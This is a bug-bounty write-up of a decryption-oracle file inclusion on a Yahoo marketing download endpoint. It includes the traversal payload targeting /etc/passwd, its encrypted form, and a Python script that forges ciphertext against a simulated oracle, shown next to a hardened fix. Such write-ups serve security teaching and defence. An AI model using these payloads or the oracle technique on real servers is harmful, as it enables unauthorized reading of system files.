Local File Include on marketing-dam.yahoo.com

From Hackipedia
Hackerone #7779
Target: Yahoo.com
Target Module:
Type: File Inclusion/Oracle
Payload:
Original: Link
CVE:
Archive [Screenshot]

RedShark1802 gives a good description of the bug in the ticket summary section, so much of this will be a reiteration and an attempt to break it down further.

The URL that RedShark1802 starts playing with looks like this in its original form:

marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U

With the URL encoding removed:

8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U

hj is the vulnerable parameter: it specifies the file to download by passing the file name in an encrypted form.

Any string passed in via hj is decrypted by the server, and the decrypted value is placed in the file download prompt (the filename the browser offers to save the response as). This allowed RedShark1802 to pass arbitrary strings like "aaaaaaaaaa" and observe the decrypted response in order to work out the proper attack string. A vulnerability like this is called an oracle: the server answers the question "what does this ciphertext decrypt to?" for any ciphertext you hand it, which makes the encryption moot, because you can use those answers to assemble a ciphertext for a plaintext of your choosing without ever knowing the key.

Eventually he was able to turn the payload
/../../../../../../../../etc/passwd
into the encrypted form the server expects,
/../../../../../../../../79d/zGcIwd
and collect himself a cool $2500.

Two things are worth noticing in that pair. The traversal prefix "/../.." comes through unchanged while the letters of "etc/passwd" are substituted, so the scheme leaves the path separators alone. And the two s's in "passwd" come out as different characters ("c" and "I"), so it is not a simple one-to-one letter substitution: the same letter can encrypt differently depending on where it sits, which is exactly what the oracle lets you map out position by position.
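The following is an added worked example of the oracle attack described above; it is not RedShark1802's script and not Yahoo's DLAgent code. The page does not say which cipher DLAgent used, so the cipher here is a hypothetical stand-in chosen only to reproduce the two properties visible in the page's payloads ('/' and '.' pass through unchanged, and the same letter can encrypt differently at different positions). The attacker-side function never touches the key; it only calls the download endpoint, feeds it strings like "aaaaaaaaaa" and reads back the decrypted filename, then uses the resulting per-position tables to assemble a ciphertext for /../../../../../../../../etc/passwd. A hardened endpoint that authenticates hj before decrypting is shown beside it. All names (`VulnerableDLAgent`, `SECRET_KEY`, `issue_token`, ...) are assumptions for the example.

```python
"""Decryption-oracle walkthrough (added example; not the page's or Yahoo's code).

The cipher is a hypothetical stand-in: a per-position shift over [A-Za-z0-9]
keyed by a secret byte string.  It reproduces what the page's payloads show
('/' and '.' unchanged, the two s's in "passwd" encrypting differently) and
that is all the attack below relies on.
"""
import hashlib
import hmac
import string

ALPHABET = string.ascii_letters + string.digits  # the 62 symbols that get shifted
SECRET_KEY = b"hypothetical-server-key"           # server-side only; attacker never sees it


def _shift(text: str, key: bytes, sign: int) -> str:
    """Shift each alphabet character by the key byte for its position.
    Non-alphabet characters ('/', '.', '_', '-') are copied through, which is
    why the traversal prefix "/../../" survives unchanged."""
    out = []
    for i, ch in enumerate(text):
        if ch in ALPHABET:
            k = key[i % len(key)]
            out.append(ALPHABET[(ALPHABET.index(ch) + sign * k) % len(ALPHABET)])
        else:
            out.append(ch)
    return "".join(out)


def server_encrypt(filename: str) -> str:
    """What the site does when it builds a legitimate hj for a document."""
    return _shift(filename, SECRET_KEY, +1)


def server_decrypt(hj: str) -> str:
    return _shift(hj, SECRET_KEY, -1)


class VulnerableDLAgent:
    """Models the bug: hj is decrypted and the plaintext is reflected back as the
    download filename, so every request doubles as a decryption query."""

    def __init__(self) -> None:
        self.queries = 0

    def download(self, hj: str) -> str:
        self.queries += 1
        # Think: Content-Disposition: attachment; filename="<decrypted hj>"
        return server_decrypt(hj)


def forge_ciphertext(oracle: VulnerableDLAgent, target: str) -> str:
    """Produce an hj that the server decrypts to `target`, using only the oracle.

    Probing with "aaaa...", "bbbb...", ... (each probe as long as the target)
    reveals, for every position, which ciphertext character decrypts to which
    plaintext character.  The forged value is then a per-position table lookup.
    No key knowledge is needed, only that each position is an independent
    one-to-one substitution."""
    n = len(target)
    table = [{} for _ in range(n)]  # position -> {plaintext char: ciphertext char}

    def resolved() -> bool:
        return all(target[i] not in ALPHABET or target[i] in table[i] for i in range(n))

    for probe_char in ALPHABET:
        plain = oracle.download(probe_char * n)
        for i, p in enumerate(plain):
            table[i][p] = probe_char
        if resolved():  # stop as soon as every position we need is known
            break
    return "".join(
        target[i] if target[i] not in ALPHABET else table[i][target[i]] for i in range(n)
    )


def issue_token(filename: str) -> str:
    """Hardened server side: tag the ciphertext so only values the server itself
    produced are ever decrypted (encrypt-then-MAC)."""
    ct = server_encrypt(filename)
    tag = hmac.new(SECRET_KEY, ct.encode(), hashlib.sha256).hexdigest()
    return f"{ct}.{tag}"


def hardened_download(token: str):
    """Verify the tag before decrypting.  A forged hj gets no plaintext back, so
    there is nothing for the attacker to observe and the oracle is closed."""
    ct, sep, tag = token.rpartition(".")
    expected = hmac.new(SECRET_KEY, ct.encode(), hashlib.sha256).hexdigest()
    if not sep or not hmac.compare_digest(tag, expected):
        return None
    return server_decrypt(ct)


if __name__ == "__main__":
    oracle = VulnerableDLAgent()
    target = "/../../../../../../../../etc/passwd"
    hj = forge_ciphertext(oracle, target)
    print("forged hj   :", hj)
    print("decrypts to :", server_decrypt(hj), f"({oracle.queries} oracle queries)")
    print("hardened    :", hardened_download(hj + "." + "0" * 64))
```

The probe loop needs at most 62 requests regardless of how long the target path is, because one probe string answers the question for every position at once. The hardened variant shows the actual fix for this class of bug: the problem is not the cipher's secrecy but the fact that unauthenticated, attacker-chosen ciphertext reaches the decryption routine and its output is echoed back; rejecting anything without a valid tag removes the oracle entirely.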